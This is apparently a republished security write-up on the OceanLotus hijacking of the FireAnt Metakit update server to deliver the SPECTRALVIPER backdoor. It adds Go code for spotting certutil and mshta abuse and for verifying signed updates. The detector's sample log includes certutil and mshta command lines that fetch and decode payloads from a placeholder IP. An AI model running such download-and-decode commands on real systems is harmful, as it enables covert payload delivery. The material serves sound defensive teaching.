How OceanLotus Hijacked Vietnam's Stock App Update Server to Deploy the SPECTRALVIPER Backdoor
ESET uncovered a six‑month supply‑chain poisoning campaign in which the OceanLotus APT group compromised the FireAnt Metakit update server and used the app's own update channel to deliver the SPECTRALVIPER backdoor to Vietnamese investors. The case highlights the critical weakness of software updates that clients install without verifying a signature.
Event Overview
ESET identified a supply‑chain poisoning campaign by the OceanLotus (APT32) group. The adversaries compromised the official update server for the Vietnamese stock‑trading app FireAnt Metakit and, over a six‑month window, delivered malicious updates containing the SPECTRALVIPER backdoor to selected investors.
Timeline
Malicious updates began on 2 October 2025 and went undetected until the campaign was publicly disclosed in March 2026. A parallel espionage operation against a Vietnamese infrastructure and transportation construction firm, also using SPECTRALVIPER, ran from mid‑2024 to February 2026.
Targets
The primary victims were users of FireAnt Metakit who rely on the app for stock investment. The compromise aimed to harvest sensitive financial and transaction data.
Technical Analysis
Attack Method
OceanLotus used a classic supply‑chain poisoning technique. Having gained access to the FireAnt Metakit update server, the group used the app's normal update mechanism to push a package carrying the SPECTRALVIPER backdoor. The root cause was the absence of digital‑signature verification for update packages: the client executed whatever the server delivered, so anyone who controlled the server could deliver arbitrary code. Transport encryption does not close this gap, because TLS authenticates the server endpoint rather than the publisher of the package; only a signature checked against a key pinned in the client does that.
SPECTRALVIPER Capabilities
Remote command execution: Executes arbitrary system commands received from the command‑and‑control server.
Data theft: Harvests credentials from browsers, email clients, FTP clients, and other common applications.
Persistence: Modifies system startup entries or registry Run keys to maintain a long‑term foothold.
Covert communication: Uses legitimate web protocols to blend C2 traffic with normal traffic, evading typical firewall rules.
MITRE ATT&CK Mapping
Initial Access – T1195.002 – Supply Chain Compromise: Compromise Software Supply Chain (malicious software updates)
Command & Control – T1071.001 – Application Layer Protocol (Web Protocol)
Exfiltration – T1041 – Exfiltration Over C2 Channel
Persistence – T1547.001 – Registry Run Keys / Startup Folder
Detection Strategies
Network layer: Baseline traffic between clients and the update server (destinations, volumes, cadence) and flag deviations; beaconing to algorithmically generated (DGA) domains is one indicator of an implant's C2 channel.
Host layer: Enable process‑creation and command‑line logging; watch for living‑off‑the‑land binaries such as certutil or mshta, which SPECTRALVIPER frequently uses, particularly when the parent process is the trading app or its updater.
Application layer: Track update frequency and timing, and alert on updates that arrive outside the vendor's normal release pattern.
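The host‑layer rule above, as an added example that is not part of the original article or of any ESET detection content: a Go scanner over constructed process‑creation records (Sysmon Event ID 1 style, reduced to timestamp, parent image, image and command line) that flags certutil used for download or decode, mshta launched with a remote URL or inline script, and either binary spawned by the trading app's updater. The updater image name fireant-updater.exe, the file paths, the 203.0.113.7 address and every log line are constructed for the demo and are not indicators from the incident.

```go
package main

import (
	"fmt"
	"path/filepath"
	"strings"
)

// ProcEvent is one process-creation record (Sysmon Event ID 1 or Windows
// 4688 style) reduced to the four fields the rules below need.
type ProcEvent struct {
	Time        string
	ParentImage string
	Image       string
	CommandLine string
}

// Alert names the rule that fired and the 1-based log line it fired on.
type Alert struct {
	Line  int
	Rule  string
	Event ProcEvent
}

// UpdaterImages is a hypothetical list of image names the trading app's
// updater runs under; any certutil/mshta child of one is an alert.
var UpdaterImages = map[string]bool{"fireant-updater.exe": true}

// SampleLog is constructed input in the form time|parent|image|command line.
var SampleLog = []string{
	`2026-03-02T09:14:07Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe C:\Users\an\notes.txt`,
	`2026-03-02T09:15:30Z|C:\Windows\System32\services.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\certs\root.cer`,
	`2026-03-02T09:16:02Z|C:\Windows\System32\cmd.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://203.0.113.7/u.txt C:\Users\Public\u.txt`,
	`2026-03-02T09:16:05Z|C:\Program Files\Microsoft Office\WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta.exe https://203.0.113.7/a.hta`,
	`2026-03-02T09:17:11Z|C:\Program Files\FireAnt\fireant-updater.exe|C:\Windows\System32\certutil.exe|certutil.exe -decode C:\Users\Public\u.txt C:\Users\Public\svc.exe`,
	`2026-03-02T09:18:40Z|C:\Windows\explorer.exe|C:\Windows\System32\mshta.exe|mshta.exe C:\Tools\local-report.hta`,
}

// imageName normalises a Windows path to its lower-case file name so the
// rules match regardless of drive, directory or letter case.
func imageName(p string) string {
	return strings.ToLower(filepath.Base(strings.ReplaceAll(p, `\`, "/")))
}

// ParseEvent splits one pipe-delimited record; the command line may itself
// contain pipes, so only the first three separators are significant.
func ParseEvent(line string) (ProcEvent, bool) {
	f := strings.SplitN(line, "|", 4)
	if len(f) != 4 {
		return ProcEvent{}, false
	}
	return ProcEvent{Time: f[0], ParentImage: f[1], Image: f[2], CommandLine: f[3]}, true
}

// Classify returns the name of the rule an event trips, or "" if none does.
func Classify(e ProcEvent) string {
	img := imageName(e.Image)
	if img != "certutil.exe" && img != "mshta.exe" {
		return ""
	}
	// An updater has no business launching either binary, whatever the arguments.
	if UpdaterImages[imageName(e.ParentImage)] {
		return "lolbin child of updater"
	}
	cmd := strings.ToLower(e.CommandLine)
	if img == "certutil.exe" {
		// -urlcache fetches from a URL; -decode/-encode turn text into a binary.
		for _, flag := range []string{"-urlcache", "/urlcache", "-decode", "/decode", "-encode", "/encode"} {
			if strings.Contains(cmd, flag) {
				return "certutil download/decode"
			}
		}
		return ""
	}
	// mshta given a URL or an inline protocol handler runs remote or
	// in-memory script without an HTA file on disk.
	for _, marker := range []string{"http://", "https://", "javascript:", "vbscript:"} {
		if strings.Contains(cmd, marker) {
			return "mshta remote/inline script"
		}
	}
	return ""
}

// Scan runs every record through Classify and collects the alerts.
func Scan(lines []string) []Alert {
	var alerts []Alert
	for i, line := range lines {
		e, ok := ParseEvent(line)
		if !ok {
			continue
		}
		if rule := Classify(e); rule != "" {
			alerts = append(alerts, Alert{Line: i + 1, Rule: rule, Event: e})
		}
	}
	return alerts
}

func main() {
	for _, a := range Scan(SampleLog) {
		fmt.Printf("line %d [%s] parent=%s cmd=%s\n", a.Line, a.Rule, imageName(a.Event.ParentImage), a.Event.CommandLine)
	}
}
```

On the sample, lines 3, 4 and 5 alert while the certutil -verify call and the local .hta stay quiet: matching on the binary name alone would bury the signal in administrative noise, so the rules key on the arguments that make these binaries useful to an implant, and on the one parent process that should never spawn them at all.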
Defense Measures
Sign every update package and have the client verify the signature against a publisher key pinned in the application before installing anything; reject unsigned or mis‑signed packages and downgrades to older versions.
Secure update channels: Host update servers in hardened network zones with strict access controls and multi‑factor authentication, and keep the signing key off the update server entirely so that server compromise alone cannot produce a valid update.
Deploy IDS/IPS at the perimeter of update server networks to detect potential compromise.
Prepare a supply‑chain incident response playbook to enable rapid containment and remediation.
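The verification gate described under Attack Method and in the first defense measure, as an added example that is not code from the original article, from ESET, or from the FireAnt Metakit app. It is a minimal Go update client: the publisher signs a manifest (product, version, payload digest) with Ed25519, and the client verifies the signature against a pinned public key before it reads anything from the manifest, then checks the product, the version (to block replay of an old, genuinely signed release) and the payload digest. The product name, version numbers, payload bytes and the fixed key seeds are constructed for the demo; a real client compiles in only the publisher's public key and keeps the private key on an offline release host, never on the update server.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"errors"
	"fmt"
)

// Manifest is the metadata the publisher signs. The client trusts none of it
// (product, version, digest) until the signature over the bytes has verified.
type Manifest struct {
	Product string `json:"product"`
	Version int    `json:"version"`
	SHA256  string `json:"sha256"` // hex SHA-256 of the payload bytes
}

// SignedUpdate is what the update server serves: the manifest bytes, a
// detached Ed25519 signature over exactly those bytes, and the payload.
type SignedUpdate struct {
	ManifestJSON []byte
	Signature    []byte
	Payload      []byte
}

var (
	ErrBadSignature = errors.New("update: signature does not verify against the pinned publisher key")
	ErrWrongProduct = errors.New("update: manifest is for a different product")
	ErrRollback     = errors.New("update: version is not newer than the installed version")
	ErrBadDigest    = errors.New("update: payload digest does not match the signed manifest")
)

// Constructed, deterministic seeds for the demo only. The attacker seed stands
// for a key the adversary controls; the client never pins it.
var (
	PublisherSeed = bytes.Repeat([]byte{0x01}, ed25519.SeedSize)
	AttackerSeed  = bytes.Repeat([]byte{0x02}, ed25519.SeedSize)
)

// SignUpdate is the publisher-side step on the release host: bind the payload
// digest into the manifest, serialise it, and sign the serialised bytes.
func SignUpdate(priv ed25519.PrivateKey, m Manifest, payload []byte) (SignedUpdate, error) {
	sum := sha256.Sum256(payload)
	m.SHA256 = hex.EncodeToString(sum[:])
	mj, err := json.Marshal(m)
	if err != nil {
		return SignedUpdate{}, err
	}
	return SignedUpdate{ManifestJSON: mj, Signature: ed25519.Sign(priv, mj), Payload: payload}, nil
}

// VerifyUpdate is the client-side gate the compromised updater lacked. The
// signature is checked before the manifest is parsed, so nothing from an
// unauthenticated manifest (not even its version) steers control flow.
func VerifyUpdate(pinned ed25519.PublicKey, product string, installed int, u SignedUpdate) (*Manifest, error) {
	if !ed25519.Verify(pinned, u.ManifestJSON, u.Signature) {
		return nil, ErrBadSignature
	}
	var m Manifest
	if err := json.Unmarshal(u.ManifestJSON, &m); err != nil {
		return nil, err
	}
	if m.Product != product {
		return nil, ErrWrongProduct
	}
	if m.Version <= installed { // a replayed, genuinely signed old release is still refused
		return nil, ErrRollback
	}
	sum := sha256.Sum256(u.Payload)
	if hex.EncodeToString(sum[:]) != m.SHA256 {
		return nil, ErrBadDigest
	}
	return &m, nil
}

func main() {
	const product = "FireAnt Metakit"
	publisher := ed25519.NewKeyFromSeed(PublisherSeed)
	attacker := ed25519.NewKeyFromSeed(AttackerSeed)
	pinned := publisher.Public().(ed25519.PublicKey)
	genuine := []byte("constructed stand-in for the legitimate installer")
	backdoored := []byte("constructed stand-in for an installer carrying an implant")

	good, _ := SignUpdate(publisher, Manifest{Product: product, Version: 142}, genuine)
	check := func(label string, u SignedUpdate, installed int) {
		_, err := VerifyUpdate(pinned, product, installed, u)
		fmt.Printf("%-36s -> %v\n", label, err)
	}
	check("genuine release", good, 141)
	swapped := good // attacker owns the server and swaps the payload behind a genuine manifest
	swapped.Payload = backdoored
	check("payload swapped on server", swapped, 141)
	forged, _ := SignUpdate(attacker, Manifest{Product: product, Version: 143}, backdoored)
	check("manifest signed with attacker key", forged, 141)
	check("replay of already-installed release", good, 142)
}
```

Running it shows the three moves available to an adversary who controls only the server (swap the payload, re‑sign with their own key, replay an old release) each rejected with a distinct error, while the genuine release passes. None of the three is stopped by TLS, which is why the signature check belongs in the client rather than in the transport.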
Conclusion
The FireAnt Metakit supply‑chain attack shows that compromising a legitimate update mechanism lets adversaries bypass traditional perimeter defenses and deliver a capable backdoor to high‑value financial targets. Auditing third‑party update mechanisms, enforcing signature verification in the client, and continuous monitoring of update traffic and host behaviour are the essential mitigations.
This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact us and we will review it promptly.
Black & White Path